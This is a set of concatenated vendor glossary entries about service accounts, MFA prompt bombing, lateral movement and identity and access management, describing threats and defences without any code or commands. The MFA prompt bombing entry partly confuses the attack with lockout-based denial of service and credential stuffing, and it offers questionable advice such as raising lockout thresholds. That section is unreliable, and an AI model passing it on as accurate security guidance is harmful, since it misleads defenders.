applications. Benefits of Service Accounts Service accounts offer several advantages that contribute to the overall efficiency and security of an IT system. Here are three key benefits: Improved Security and Accountability Service accounts enhance security by providing a separate identity for applications and services. By using unique identifiers and credentials, organizations can better manage access controls, enforce the principle of least privilege, and minimize the risk of unauthorized access. Service accounts also contribute to accountability by allowing organizations to track and audit actions performed by applications, aiding in incident investigation and compliance efforts. Streamlined Administration and Maintenance By centralizing the management of service accounts, organizations can streamline administrative tasks. Service accounts can be easily provisioned, modified, and revoked as needed, reducing the administrative burden associated with managing individual user accounts. Additionally, through automation and standardized processes, organizations can ensure consistent and efficient management of service accounts across their IT ecosystem. Enhanced System Performance and Reliability Service accounts contribute to improved system performance and reliability. With their automation capabilities, service accounts can execute tasks promptly and consistently, reducing manual intervention and associated delays. By automating IT processes, organizations can achieve faster response times, reduce downtime, and enhance the overall reliability of their systems. Service accounts also help in load balancing and optimizing resource utilization, further enhancing system performance. What is an example of a service account? An example of a service account is a Google Cloud Platform (GCP) service account. GCP service accounts are used to authenticate applications and services that run on GCP. They allow the application or service to interact with other GCP resources, such as Google Cloud Storage or Google BigQuery. For example, if you are running an application on a GCP virtual machine (VM) that needs to access data stored in Google Cloud Storage, you would create a GCP service account and assign the appropriate permissions to it. The application running on the VM would then use the service account’s credentials to authenticate to Google Cloud Storage and access the data. Additionally, Service accounts can also be used to authenticate to other services, like APIs, databases, and more. What are the types of service accounts? There are different types of service accounts based on their purpose and scope. Here are three common types: Local Service Accounts Local service accounts are specific to a single device or system. They are created and managed locally on the system and are used to run services or processes that are limited to that particular device. Local service accounts are typically associated with system services and are not shared across multiple systems. Network Service Accounts Network service accounts are designed for network services that need to interact with other systems or resources. These accounts have a broader scope than local service accounts and can be used by multiple systems within a network. Network service accounts provide a means for services to authenticate and access resources across different systems while maintaining a consistent identity. Managed Service Accounts (MSAs) Managed service accounts are a feature introduced by Microsoft Active Directory. They are domain-based accounts specifically created for services running on Windows systems. Managed service accounts provide automatic password management, simplified administration, and improved security. They are associated with a specific computer or service and can be used by multiple systems within a domain. It's important to note that the specific types of service accounts may vary depending on the operating system and the technologies used within an organization's IT infrastructure. How are service accounts created? a) Independent creation by administrators: Administrators may create service accounts to manage specific services or applications within the organization. For example, if an organization implements a new internal application or system, administrators may create dedicated service accounts to ensure secure and controlled access to the application. b) Installation of an on-prem enterprise application: When installing an on-premises enterprise application (e. g. , Customer Relationship Management (CRM) software, Enterprise Resource Planning (ERP) software), the installation process may create dedicated service accounts to manage the application's services, databases, and integrations. These accounts are created automatically to ensure seamless operation and secure access to the application's components. Is a service account a privileged account? Yes, a service account can be considered a privileged account. Privileged accounts, including service accounts, have elevated privileges and permissions within an IT system. Service accounts often require elevated privileges to perform specific tasks, such as accessing sensitive data or executing administrative functions. However, it is important to carefully manage and restrict the privileges assigned to service accounts to adhere to the principle of least privilege and minimize the potential impact of any security breaches or unauthorized access. Is a local account a service account? No, a local account is not necessarily a service account. Local accounts are specific to a single device or system and are typically associated with human users who interact directly with that device. Service accounts, on the other hand, are designed for system-to-system or application-to-application communication, representing the identity and authorization of an application or service rather than an individual user. Is a service account a domain account? A service account can be a domain account, but not all service accounts are domain accounts. A domain account is associated with a Windows domain and can be used across multiple systems within that domain. Service accounts can also be created as local accounts specific to a single system. The choice between using a domain account or a local account for a service account depends on the specific requirements and architecture of the IT environment. Is a service account a shared account? In a sense, service accounts can be considered shared accounts. However, they are distinct from traditional shared accounts typically associated with multiple human users. Service accounts are shared among applications or services, allowing them to authenticate and perform actions on their behalf. Unlike shared accounts used by human users, service accounts have unique identifiers and credentials, separate from individual users, and are managed specifically for the purpose of facilitating system-to-system communication and automation. Are service accounts a security risk? Service accounts in Active Directory environments can introduce significant cybersecurity risks, particularly in terms of lateral movement attacks. Lateral movement refers to the technique used by attackers to navigate through a network after gaining initial access, with the goal of accessing valuable resources and escalating privileges. One key weakness is the lack of visibility into service accounts. Service accounts are often created to run various applications, services, or automated processes within an organization's network. These accounts are typically granted high access privileges to perform their designated tasks, such as accessing databases, network shares, or critical systems. However, due to their automated nature and often decentralized management, service accounts are often overlooked and lack proper oversight. This lack of visibility makes it challenging for security teams to monitor and detect any malicious activities associated with service accounts. The high access privileges assigned to service accounts pose another risk. Since service accounts are granted extensive permissions, compromising these accounts can provide attackers with broad access to sensitive data and critical systems. If an attacker gains control over a service account, they can potentially move laterally across the network, accessing different systems and resources without raising suspicion. The elevated privileges of service accounts make them attractive targets for attackers seeking to escalate their access and carry out their malicious objectives. Additionally, the inability to rotate service account passwords in a Privileged Access Management (PAM) vault further reinforces the risk. Regularly changing passwords is a fundamental security practice that helps mitigate the impact of compromised credentials. However, due to their automated nature and dependencies on various systems, service accounts often cannot be easily integrated with traditional password rotation mechanisms. This limitation leaves service account passwords static for extended periods, increasing the risk of compromise. Attackers can exploit this weakness, utilizing the static passwords to gain persistent access and carry out lateral movement attacks. What are the common examples of insecure usage of service accounts? Shared Credentials: Administrators may use the same set of credentials (username and password) for multiple service accounts or across different environments. This practice can increase the impact of credential compromise since an attacker who gains access to one service account can potentially access other accounts or systems. Weak Passwords: Administrators might use weak or easily guessable passwords for service accounts. Weak passwords can be easily exploited through brute-force attacks or password guessing techniques, leading to unauthorized access. Lack of Password Rotation: Service account passwords are not regularly rotated. If service account passwords remain unchanged for an extended period, it provides an opportunity for attackers to use the same compromised credentials repeatedly, increasing... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/mfa-prompt-bombing/ A targeted attack in which adversaries flood users with authentication requests to wear them down into approving false login attempts. MFA prompt bombing is an attack method used to bypass multi-factor authentication (MFA) security. This technique works by flooding users with MFA prompts to access a system, with the goal of finding a prompt that the user accepts. MFA prompt bombing is an emerging cyber threat that organizations must understand and defend against. As multi-factor authentication has become more widely adopted to strengthen account security, threat actors have developed techniques to systematically target users with authentication requests in an attempt to gain access. Through repeated login prompts, hackers try to confuse or frustrate users into entering their credentials or approval into a malicious site or app. This technique, known as MFA prompt bombing, allows attackers to bypass multi-factor authentication and gain access to sensitive accounts and data. Cybersecurity professionals and business leaders need awareness and education about this threat to protect their organizations. By understanding how MFA prompt bombing works and the strategies to mitigate risk, companies can avoid becoming victims of this increasingly common attack vector. An Overview of Multi-Factor Authentication (MFA) Multi-factor authentication (MFA) is an authentication method that requires the user to provide two or more verification factors to gain access to a resource such as an application, online account, or VPN. MFA adds an extra layer of security to user sign-ins and transactions. Traditional authentication methods rely on a single factor — typically a password. However, passwords can be stolen, guessed, or hacked. Through MFA, unauthorized access can be prevented by requiring more than just a password. This could be in the form of a security key, a code that is sent to a mobile device, or a biometric scan. MFA protects against phishing, social engineering, and password-cracking attacks. Even if a hacker obtained a user's password, they would still need the second authentication factor to gain access. This multi-pronged approach significantly reduces the risk of account compromise. There are several types of MFA options: SMS text messages: A one-time code is sent to the user's phone via text message. The user enters that code to verify their identity. Authenticator apps: An app like Google Authenticator or Authy generates one-time codes for the user to enter. This method does not rely on the user having cell service or a text-enabled phone. Security keys: A physical USB drive or Bluetooth device must be inserted or tapped to verify the login. This is a very secure form of MFA. Biometrics: Technologies like fingerprint, facial, or voice recognition are used to authenticate the user's identity. Biometrics are very convenient but can be spoofed in some cases. MFA should be implemented for any system or application that contains sensitive data or funds to help reduce risks like account takeover and fraud. When set up properly, MFA is an effective control that enhances login security and protects user accounts. How MFA Prompt Bombing Works MFA prompt bombing begins with an attacker gaining access to a user's username and password. The attacker then uses automation to generate and submit a high volume of login attempts for the user's account. Each login attempt triggers an MFA prompt, like a text message with a one-time code or an authentication app notification. The attacker continues generating login attempts at a rapid pace until the user accepts an MFA prompt, whether intentionally or accidentally. Accepting a prompt gives the attacker the authentication code they need to access the user's account. At this point, the attacker has bypassed MFA and has gained full access. MFA prompt bombing preys on user psychology and limited human attention spans. When bombarded with a barrage of prompts in quick succession, a user is more likely to tap or enter a code without thinking in order to make the prompts stop. Even if the user realizes the mistake immediately, the attacker already has the access they need. To defend against MFA prompt bombing, organizations should monitor for unusually high volumes of MFA prompts for a single user account. Prompt bombing also highlights the need for stronger authentication methods that are more difficult to bypass, such as FIDO2 security keys, biometric authentication, and risk-based MFA. By implementing adaptive MFA policies and robust authentication monitoring, companies can reduce the risks of prompt bombing and other MFA bypass techniques. Examples of MFA Prompt Bombing Attacks MFA prompt bombing attacks target users who have access to critical systems by attempting to overwhelm them with authentication requests. These brute force attacks aim to deny access to legitimate users by locking them out of accounts and systems. Automated Botnets Cybercriminals often employ botnets, networks of infected computers, to carry out MFA prompt bombing attacks. The bots are programmed to repeatedly attempt authentication to target systems using lists of stolen or guessed credentials. Due to the high volume of login attempts, the target MFA systems lock out accounts to prevent unauthorized access. However, this also blocks valid users from accessing their accounts. Credential Stuffing Another common tactic used in MFA prompt bombing is credential stuffing. Hackers obtain lists of usernames and passwords from previous data breaches and leaks. They then stuff these credentials into the target system's login page as quickly as possible. The repeated failed login attempts trigger the account lockout mechanisms, resulting in denial of service. Mitigation Techniques for MFA Prompt Bombing There are several methods organizations can employ to mitigate the threat of MFA prompt bombing: Use adaptive authentication: Systems that can detect and block automated bot activity. They analyze login velocity, geo-location, and other factors to determine suspicious access attempts. Employ IP whitelisting: Restrict access to only trusted IP addresses and block all others. This makes it difficult for hackers to conduct attacks from their own systems. Increase account lockout thresholds: Raising the number of failed login attempts allowed before an account is locked out reduces the effectiveness of brute force attacks while still preventing unauthorized access. Implement risk-based authentication: Require additional authentication factors for logins from unknown or suspicious locations/devices. This adds another layer of security for high-risk access attempts. Use reCAPTCHA: The reCAPTCHA system can detect and block automated bots. It presents users with challenges that are difficult for bots to solve in order to verify that a human is attempting access. MFA prompt bombing threatens organizations by denying users access to their accounts and systems. However, with vigilance and proper safeguards in place, the risks posed by these kinds of brute force attacks can be significantly mitigated. Continuous monitoring and adaptation to evolving threats is key. How to Detect MFA Prompt Bombing To detect MFA prompt bombing, organizations should implement the following security measures: Monitor for Anomalous Login Attempts Monitoring for an unusually high volume of failed login attempts, especially across multiple accounts or sources, can indicate MFA prompt bombing activity. Cybercriminals are likely to try different passwords and usernames in an attempt to guess correct credentials. Organizations should set thresholds to detect these anomalies and receive alerts when they occur. Review MFA Prompts and Responses Reviewing MFA prompts and user responses can uncover signs of MFA prompt bombing such as: Repeated invalid passcodes or push notification approvals from the same device. Multiple MFA prompts for different accounts originating from a single device within a short time period. MFA prompts for accounts the device has never accessed before. Inspect VPN and Network Logs Analyzing virtual private network (VPN) logs and network activity can also reveal MFA prompt bombing. Things to look for include: A device accessing the VPN from an unusual location. Cybercriminals often spoof locations to mask their identity. A device connecting to the network at an unusual time when the legitimate user is unlikely to log in. A device accessing a high number of accounts or sensitive resources within the network in a short period. This could indicate the hackers are "spraying and praying" with stolen credentials. Deploy Additional Identity Security Controls Organizations should implement additional identity security controls to reduce the risk of MFA prompt bombing like: Requiring a second authentication factor for risky access like VPN logins or access to sensitive data. Using a FIDO2 passwordless authentication can make MFA prompt bombing much harder. Monitoring for login attempts from locations that differ from a user's typical access pattern. Unusual access locations can indicate account takeover. Rotating and randomizing MFA passcodes to ensure hackers cannot reuse stolen codes. Providing user education on spotting and reporting MFA prompt bombing attempts. By maintaining vigilance and implementing a strong identity security strategy, organizations can detect and mitigate the threat of MFA prompt bombings. It is essential to implement a proactive security strategy across people, processes, and technology to fight off MFA prompt bombing attacks.   Preventing MFA Prompt Bombing: Best Practices Implement Multi-Factor Authentication To prevent MFA prompt bombing, organizations should implement multi-factor authentication (MFA) across all internet-facing resources and user accounts. MFA adds an additional layer of security that requires not only a password but also another method of verification like a security code sent via text message or an authentication app. With MFA enabled, attackers using stolen credentials won't succeed to gain access unless they also have access to the user’s phone or authentication device. Use MFA Options Resistant to Prompt Bombing Some MFA options are more susceptible to prompt bombing than others. SMS text messaging and voice calls can be compromised, allowing attackers to intercept authentication codes. Hardware tokens and authentication apps provide a higher level of security. Security keys, like YubiKeys, offer the strongest protection and should be used for administrators and privileged accounts whenever possible. Monitor for MFA Prompt Bombing Attempts Security teams should monitor user accounts, authentication requests for signs of prompt bombing attempts. Things like an unusually high number of MFA prompts in a short time span, MFA prompts originating from suspicious IP addresses, or reports of SMS or voice phishing messages claiming to be MFA codes can all indicate prompt bombing. Detected attacks should trigger an immediate password reset and review of the user's account activity. Provide MFA Education and Training Educating users about MFA and prompt bombing helps reduce risk. Training should cover: How MFA works and the security benefits it provides. The various MFA methods available and their level of protection. What a legitimate MFA prompt looks like for each method used and how to identify phishing attempts. The importance of never sharing MFA codes or authentication devices with others. Procedures to follow if a user receives an unsolicited MFA prompt or suspects their account has been compromised. With the right controls and user education in place, organizations can reduce the threat of MFA prompt bombing and strengthen their users' overall security hygiene. However, as with any cybersecurity defense, continued vigilance and regular reviews of new threats and mitigation techniques are required. Choosing an MFA Solution Resistant to Prompt Bombing To prevent prompt bombing attacks, organizations should implement an MFA solution that uses dynamically generated one-time passcodes (OTPs) instead of SMS text messages. These solutions generate a new OTP each time a user logs in, so attackers cannot reuse codes to gain unauthorized access. Hardware Tokens Hardware tokens, such as YubiKeys, generate OTPs that change with each login. Since the codes are generated on-device, attackers cannot intercept them via SMS or voice call. Hardware tokens offer a high level of security but may require an upfront investment to purchase the tokens. They also require users to carry an additional physical device, which some may find inconvenient. Authenticator Apps Authenticator apps like Google Authenticator, Azure MFA, Silverfort, and Duo generate OTPs on the user's phone without relying on SMS or voice calls. The OTPs change frequently and the apps do not transmit the codes over a network, so they are very difficult for attackers to intercept or reuse. Authenticator apps are a secure, convenient, and low-cost MFA solution for organizations on a budget. However, they still require users to have a device capable of running the mobile app. Biometrics Biometric authentication, such as fingerprint, face, or iris scanning, offers an MFA solution that is very resistant to prompt bombing and other cyber attacks.... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/lateral-movement/ A tactic used by threat actors to stealthily navigate across compromised systems within a network, escalating privileges and reaching high-value assets while avoiding detection. Lateral movement refers to the technique used by threat actors to navigate through a compromised network or system, stealthily moving from one host to another. Unlike traditional attacks that target a single entry point, lateral movement allows attackers to spread their influence, expand their control, and access valuable assets within the network. It is a crucial phase of an APT attack, enabling attackers to maintain persistence and achieve their objectives. Why is lateral movement used by attackers? Attackers utilize the lateral movement technique for several reasons, including establishing persistence, accessing high-value targets, escalating privileges, exfiltrating data, and evading security controls. Persistence and Avoiding Detection: Lateral movement offers attackers a means to establish persistence within a compromised network. By moving laterally across systems, attackers can evade detection mechanisms that may be focused on monitoring a specific entry point. This technique allows them to remain undetected for longer periods, maximizing their ability to carry out their malicious activities without triggering alarms or arousing suspicion. Access to High-Value Targets: Once an initial entry point is compromised, lateral movement allows attackers to explore the network and identify high-value targets. These targets can include sensitive data repositories, critical infrastructure components, or privileged accounts that hold significant power within the organization. By moving laterally, attackers can incrementally gain access to these valuable assets, increasing their control and potential for further compromise. Privilege Escalation and Exploitation: Lateral movement often involves the exploitation of vulnerabilities or weaknesses within systems. As attackers navigate through the network, they actively search for opportunities to escalate their privileges. By leveraging compromised accounts, stolen credentials, or exploiting misconfigurations, attackers can elevate their level of access, enabling them to reach more critical systems, databases, or administrative controls. Privilege escalation through lateral movement enhances their ability to manipulate and exploit the network. Data Exfiltration and Intellectual Property Theft: One of the primary motivations for attackers is the exfiltration of valuable data or intellectual property. Lateral movement provides them with the means to locate and extract this sensitive information. By strategically moving within the network, attackers can identify and target repositories containing proprietary information, customer data, trade secrets, or financial records. The ability to move laterally enables them to gradually gain access to these repositories and exfiltrate data without raising alarms. Evading Security Controls and Evasion of Defenses: The lateral movement technique enables attackers to bypass security controls that are often focused on perimeter defense. Once inside a network, they can exploit the inherent trust between interconnected systems to maneuver undetected. By moving laterally, attackers can potentially evade network monitoring, intrusion detection systems, and other security measures that are typically focused on external threats. This evasion increases their chances of remaining undetected and extends the timeframe for carrying out their malicious activities. How Lateral Movement Works Lateral movement involves a series of stages that attackers go through to infiltrate and expand their control within a network. These stages typically include: Initial Compromise: Lateral movement begins with the initial compromise, where attackers gain unauthorized access to a network or system. This can occur through various means, such as exploiting vulnerabilities, phishing attacks, or leveraging social engineering techniques. Reconnaissance: Once inside the network, attackers conduct reconnaissance to gather critical information about the network's topology, systems, and potential targets. This phase involves scanning and mapping the network, identifying vulnerable systems, and locating high-value assets. Credential Dumping: It involves the extraction or theft of credentials from compromised systems to gain unauthorized access to other systems within a network. Once the attackers have obtained valid credentials, they can reuse them to authenticate and move laterally within the network. By leveraging these stolen credentials, attackers can bypass authentication mechanisms, gain access to additional systems, and escalate their control over the network. Privilege Escalation: Attackers aim to escalate their privileges within the compromised network. This involves acquiring higher-level access rights, often by exploiting vulnerabilities, misconfigurations, or stealing credentials. Privilege escalation enables attackers to gain control over more systems and resources. Lateral Movement: The core phase of the attack, lateral movement, comes into play once attackers have elevated their privileges. Here, they navigate through the network, moving laterally from one system to another. Attackers leverage compromised accounts, stolen credentials, or exploitable vulnerabilities to access additional hosts and expand their control. Persistence and Exploitation: Attackers aim to maintain persistence within the network, ensuring their ongoing access even if initial entry points are discovered and mitigated. They establish backdoors, install persistent malware, or manipulate system configurations to maintain control. This enables them to exploit resources, exfiltrate data, or launch further attacks. How does lateral movement compare to other cyber attack techniques?   Attack TechniqueKey CharacteristicsRelationship to Lateral MovementPhishing AttacksSocial engineering techniques to extract sensitive informationLateral movement may involve the use of stolen credentialsMalwareMalicious software for data theft, disruption, or unauthorized accessLateral movement may utilize malware for propagation or persistenceDoS/DDoS AttacksOverwhelm target systems with excessive trafficNo direct alignment with lateral movementMan-in-the-Middle AttacksIntercept and manipulate communication for interception or alterationLateral movement may include interception as part of the techniqueSQL InjectionExploit web application vulnerabilities for unauthorized accessLateral movement may leverage compromised credentials or databasesCross-Site Scripting (XSS)Inject malicious scripts into trusted websites for arbitrary code execution or information theftNo direct alignment with lateral movementSocial EngineeringManipulate individuals for divulging sensitive information or performing actionsLateral movement may involve social engineering in the initial compromisePassword AttacksTechniques like brute-force or dictionary attacks for password crackingLateral movement may leverage compromised or stolen credentialsAdvanced Persistent Threats (APTs)Sophisticated, targeted attacks for persistent access and specific objectivesLateral movement is a critical phase within APTsZero-day ExploitsTarget unknown vulnerabilities before patches are availableLateral movement may incorporate zero-day exploits as part of its technique Techniques and Methods Used in Lateral Movement As the sophistication of cyber threats continues to evolve, understanding the techniques and methods used in lateral movement becomes paramount for effective defense strategies. By comprehending these techniques, organizations can implement proactive security measures, such as robust access controls, vulnerability management, and user awareness training, to mitigate the risks associated with lateral movement and protect their critical assets from cyber intruders. Here are the most common techniques involved in lateral movement attacks: I. Pass-the-Hash (PtH) Attacks: Pass-the-Hash attacks exploit the way Windows stores user credentials in the form of hashed values. Attackers extract password hashes from compromised systems and use them to authenticate and gain access to other systems within the network. By bypassing the need for plaintext passwords, PtH attacks allow attackers to move laterally without the need for continuous credential theft. II. Pass-the-Ticket (PtT) Attacks: Pass-the-Ticket attacks leverage Kerberos authentication tickets to move laterally within a network. Attackers acquire and abuse valid tickets obtained from compromised systems or stolen from legitimate users. With these tickets, they can authenticate and access additional systems, bypassing traditional authentication mechanisms. III. Remote Desktop Protocol (RDP) Hijacking: RDP hijacking involves manipulating or exploiting the Remote Desktop Protocol, which allows users to connect to remote systems. Attackers target systems with enabled RDP, exploit vulnerabilities, or use stolen credentials to gain unauthorized access. Once inside, they can navigate laterally by connecting to other systems or utilizing the compromised host as a launching point for further attacks. IV. Credential Theft and Reuse: Credential theft and reuse play a significant role in lateral movement. Attackers employ various methods, such as keylogging, phishing, or brute-forcing, to steal valid credentials. Once obtained, these credentials are reused to authenticate and move laterally across the network, potentially escalating privileges and accessing high-value targets. V. Exploitation of Vulnerabilities: Exploiting vulnerabilities is a common technique used in lateral movement. Attackers target unpatched systems or misconfigurations to gain unauthorized access. Exploiting vulnerabilities allows them to move laterally by compromising additional hosts, leveraging weaknesses in software or network configurations. VI. Malware Propagation: Malware propagation is another prevalent method employed in lateral movement. Attackers deploy malicious software, such as worms or botnets, within the compromised network. These malware instances propagate from one system to another, aiding the attackers in navigating and expanding control within the network. What are some real-world examples showcasing the impact of lateral movement attacks? Target Data Breach (2013): In one of the most prominent cyber attacks, hackers gained access to Target Corporation's network through a third-party vendor. They then used lateral movement techniques to navigate through the network, escalate privileges, and eventually compromise the point-of-sale (POS) systems. The attackers exfiltrated credit card information of approximately 40 million customers, leading to significant financial losses and reputational damage for Target. Sony Pictures Entertainment Hack (2014): In this high-profile attack, hackers believed to be linked to North Korea infiltrated Sony Pictures' network. Lateral movement techniques allowed them to move through the network, gaining access to sensitive data, including unreleased movies, executive emails, and employee personal information. The attack disrupted business operations and resulted in the release of confidential data, causing substantial financial and reputational harm. NotPetya Ransomware Attack (2017): The NotPetya ransomware attack started with the compromise of an accounting software company's update mechanism in Ukraine. Once inside, the attackers utilized lateral movement techniques to rapidly spread the malware within the organization's network. The malware propagated laterally, encrypting systems and disrupting operations of numerous organizations worldwide. NotPetya caused billions of dollars in damages and highlighted the devastating potential of lateral movement in spreading ransomware. SolarWinds Supply Chain Attack (2020): The SolarWinds attack involved the compromise of the software supply chain, specifically the Orion IT management platform distributed by SolarWinds. Through a sophisticated supply chain attack, threat actors inserted a malicious update that went undetected for several months. Lateral movement techniques were employed to move laterally within the networks of organizations that used the compromised software. This highly sophisticated attack affected numerous government agencies and private organizations, leading to data breaches, espionage, and long-lasting repercussions. These real-world examples illustrate the impact of lateral movement attacks on organizations across different sectors. They demonstrate how attackers utilize lateral movement to navigate networks, escalate privileges, access valuable data, and cause significant financial and reputational damage. How to detect & prevent lateral movement attacks? Detecting and preventing lateral movement attacks is crucial for organizations to protect their networks and valuable assets. Here are some effective strategies to detect and prevent lateral movement: Strong Access Controls and Authentication Mechanisms: Implement multi-factor authentication (MFA) and strong access controls to mitigate the risk of compromised credentials. Enforce strong password policies, regularly rotate passwords, and consider implementing technologies like Privileged Access Management (PAM) to secure privileged accounts and prevent unauthorized lateral movement. Network Monitoring and Anomaly Detection: Implement robust network monitoring solutions that can detect unusual or suspicious behavior within the network. Utilize Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Security Information and Event Management (SIEM) tools, and behavior analytics to identify anomalies, such as abnormal traffic patterns, unauthorized access attempts, or unusual user behavior. User and Entity Behavior Analytics (UEBA): Leverage UEBA solutions to monitor user activities and identify deviations from normal behavior. UEBA can detect suspicious lateral movement patterns, such as unusual account usage, privilege escalation attempts, or abnormal access to resources, helping to proactively identify potential attacks. Segmentation and Network Isolation: Implement network segmentation to divide the network into isolated zones based on security requirements and access privileges. This helps contain lateral movement within specific network segments, limiting the potential impact of an attack and making it harder for attackers to navigate and expand their control. Least Privilege Principle: Follow the principle of least privilege, ensuring that users and systems have only the necessary access rights and privileges required to perform their tasks. Restricting privileges reduces the potential for lateral movement and limits the scope of an attacker's movement within the network. Regular Patching and Vulnerability Management: Maintain a robust patch management process to promptly apply security patches and updates to systems, software, and network devices. Regularly scan and assess the network for vulnerabilities, prioritize remediation efforts, and implement security controls to mitigate known vulnerabilities that could be exploited for lateral movement. Security Awareness and Training: Educate employees and users about the risks of social engineering, phishing attacks, and the importance of secure practices. Raise awareness about the impact of... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-and-access-management-iam/ A framework of policies, processes, and technologies for creating, managing, authenticating, and authorizing digital identities to ensure that the right users access the right resources at the right times. Identity and Access Management (IAM) is a framework of policies, processes, and technologies that enable organizations to manage digital identities and control access to their resources. In simpler terms, IAM is a product category that deals with the creation of user accounts and ongoing management of their resource access, so the right people have access to the right resources at the right time. It involves managing user identities, authenticating users, authorizing access to resources, and enforcing security policies. IAM has become increasingly important for businesses as they face growing cybersecurity threats and compliance requirements. With more employees working remotely and accessing company data from various devices and locations, it's crucial for organizations to have a centralized system for managing user identities and controlling access to sensitive information. IAM helps businesses reduce the risk of data breaches, improve regulatory compliance, streamline IT operations, and enhance identity security. IAM works by creating a unique digital identity for each user within an organization's network. This identity includes information such as username, password, role or job title, department or team affiliation, and other attributes that define the user's level of access to different resources. IAM solutions use various authentication methods such as passwords, biometrics, smart cards or tokens to verify users' identities before granting them access to specific applications or data. IAM also provides tools for monitoring user activity and detecting suspicious behavior in real-time. Why is IAM important for businesses? Identity and Access Management (IAM) is a crucial aspect of any business that deals with sensitive data. It ensures that only authorized individuals have access to the information they need to perform their job functions. IAM helps businesses maintain control over their data, reduce the risk of data breaches, and comply with regulatory requirements. Without proper IAM, businesses are vulnerable to cyber attacks, which can result in significant financial losses and damage to their reputation. Hackers often target organizations that lack strong security measures, making it essential for businesses to implement IAM solutions that provide robust protection against unauthorized access. IAM also streamlines the process of managing user accounts and permissions. With IAM solutions in place, businesses can automate tasks such as creating new user accounts, assigning roles and permissions, and revoking access when necessary. This not only saves time but also reduces the risk of human error, ensuring that employees have access to the resources they need without compromising security. How does IAM work? Identity and Access Management (IAM) is a framework that enables organizations to manage user identities and their access to resources. IAM works by providing a centralized system for managing user authentication, authorization, and permissions across various applications and systems. This means that users can access the resources they need while ensuring that sensitive data remains secure. The process of IAM starts with user authentication, which verifies the identity of the user through various methods such as passwords, biometrics, or smart cards. Once the user is authenticated, IAM then determines what level of access they have based on their role within the organization. This includes granting or revoking access to specific applications or data based on predefined policies. IAM also provides auditing capabilities that allow organizations to track user activity and monitor any suspicious behavior. This helps in identifying potential security threats and taking appropriate action before any damage is done. The general steps for IAM are: Identity Management: IAM begins with identity management, which involves establishing and managing unique digital identities for individuals or entities within an organization's ecosystem. These identities can be assigned to employees, contractors, partners, or even specific systems and applications. Each identity is associated with a set of attributes and credentials, such as usernames, passwords, and digital certificates. Authentication: Authentication is the process of verifying the claimed identity of an individual or entity. IAM systems employ various authentication methods to ensure the legitimacy of users before granting access. Common authentication factors include something the user knows (passwords, PINs), something the user possesses (smart cards, hardware tokens), or something the user is (biometrics like fingerprints or facial recognition). Multi-factor authentication (MFA) combines multiple factors for enhanced security. Authorization: Once a user's identity has been established and authenticated, IAM determines the level of access and permissions that should be granted. This process is known as authorization. Authorization policies define what resources a user can access and what actions they can perform. IAM systems typically provide granular control over permissions, allowing organizations to implement the principle of least privilege (POLP), granting users only the necessary access required to fulfill their roles. Access Enforcement: IAM systems enforce access controls by acting as intermediaries between users and resources. They validate user credentials and ensure that the requested access aligns with the established authorization policies. Access enforcement mechanisms may include role-based access control (RBAC), where access rights are assigned based on predefined roles, or attribute-based access control (ABAC), which considers various attributes such as user location, time of access, or device used. Provisioning and Deprovisioning: IAM systems also handle the provisioning and de-provisioning of user accounts and access privileges. When a new user joins an organization, IAM facilitates the creation of their digital identity and assigns appropriate access rights based on their role. Similarly, when an employee leaves the organization or changes roles, IAM ensures that their access privileges are promptly revoked or modified to prevent unauthorized access. Identity Governance: Identity governance refers to the ongoing management and oversight of user identities and access rights. IAM solutions offer tools for administrators to monitor and review access permissions, detect anomalies or violations, and implement corrective actions. This helps maintain a secure and compliant environment by aligning access privileges with organizational policies and regulatory requirements. Types of IAM solutions available in the market Identity and Access Management (IAM) is a crucial aspect of any organization's cybersecurity strategy. It helps businesses to manage user identities, access permissions, and authentication processes effectively. There are various types of IAM tools available in the market that cater to different business needs. On-Premises IAM: On-Premises IAM solutions are installed and managed within an organization's own infrastructure. These solutions provide organizations with full control over their IAM infrastructure, customization options, and integration capabilities with legacy systems. On-Premises IAM offers organizations the ability to tailor IAM processes to their specific requirements and maintain direct control over security measures and compliance obligations. Cloud IAM: Cloud IAM solutions are hosted and managed by cloud service providers (CSPs). Organizations leverage IAM services offered by the CSP to handle identity management, authentication, and access control. Cloud IAM provides benefits such as scalability, rapid deployment, cost efficiency, and reduced infrastructure management. Organizations can take advantage of pre-built IAM services and leverage the CSP's expertise in managing security and compliance. Federated IAM: Federated IAM solutions enable organizations to establish trust relationships between different identity domains. Instead of managing identities and access controls within a single organization, federated IAM allows users to authenticate and access resources across multiple trusted domains. This type of IAM solution is often used in scenarios involving collaboration between organizations or when users need to access resources from various external service providers. Customer IAM (CIAM): Customer IAM solutions are specifically designed for managing the identities and access of external users, such as customers, partners, or clients. CIAM focuses on providing a seamless and secure user experience for external users by offering features like self-registration, social media login integration, single sign-on (SSO), and consent management. CIAM solutions help organizations establish and maintain strong relationships with their external user base while ensuring data privacy and security. Privileged Access Management (PAM): Privileged Access Management solutions focus on managing and securing privileged accounts and access rights. Privileged accounts have elevated privileges and are often targeted by malicious actors. PAM solutions help organizations enforce strict controls and policies around privileged access, including privileged account discovery, session monitoring, password vaulting, and just-in-time access. PAM is crucial for protecting critical systems and sensitive data from insider threats and external attacks. It's important to note that these types of IAM solutions are not mutually exclusive, and organizations can combine different approaches based on their specific needs. The selection of an appropriate IAM solution depends on factors such as organizational size, complexity, security requirements, compliance obligations, and the nature of users accessing the systems and resources. What is the Difference Between Identity Management and Access Management? While these terms are often used interchangeably, they refer to distinct aspects of IAM. In simpler terms, Identity Management is about establishing and managing digital identities, whereas Access Management is about controlling and regulating the access rights and permissions associated with those identities. IDM is responsible for creating and maintaining identities, while AM focuses on managing and enforcing access controls based on those identities. AspectIdentity Management (IDM)Access Management (AM)FocusEstablishing and managing digital identitiesControlling and managing access permissionsActivitiesUser onboarding, offboarding, identity lifecycle managementAuthentication, authorization, access control policiesObjectiveCreating and maintaining digital identitiesEnforcing access controls based on identitiesKey ComponentsUnique identities, attributes, credentialsAuthentication mechanisms, access control policiesResponsibilitiesIdentity creation and managementAccess rights enforcementExamplesUser provisioning, identity lifecycle managementRole-based access control (RBAC), authentication mechanismsRelationshipIDM provides the foundation for AMAM relies on IDM for identity information Identity Management focuses on establishing and managing digital identities for individuals or entities within an organization's ecosystem. It involves creating unique identities and associating them with attributes and credentials such as usernames, passwords, and digital certificates. IDM encompasses activities such as user onboarding, offboarding, and identity lifecycle management. 